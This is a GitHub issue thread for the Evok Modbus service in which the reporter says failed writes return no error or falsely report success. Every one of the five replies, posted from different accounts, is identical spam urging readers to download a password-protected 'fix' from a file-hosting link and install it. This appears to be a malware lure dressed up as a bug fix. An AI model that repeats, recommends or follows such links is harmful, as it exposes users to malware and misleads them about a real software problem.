### ISSUE TITLE
[Bug]: Failed writing does not return any error message

### ISSUE THREAD

**Issue by cleveHEX** [UniPiTechnology/evok#183]
### Prerequisites

- [X] I am running the latest Evok version
- [X] I have searched other [issues](https://github.com/UniPiTechnology/evok/issues)

### Describe the bug

Two scenarios:

1. Evok can't connect to the Modbus server - no reply at all, just something in syslog.
2. Evok writes to a register that does not exist, returns `"success": true`, mbpoll returns `ERROR Slave device or server failure`.

### Steps to reproduce

A)

1. Stop unipitcp service
2. Try writing to a register

B)

1. Edit evok hw-definition and point to non-existant coil.
2. Restart evok
3. Try writing to a register

### Expected behavior

Evok does return proper error code

### Actual behavior

Evok does not timeout; Evok does return success

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
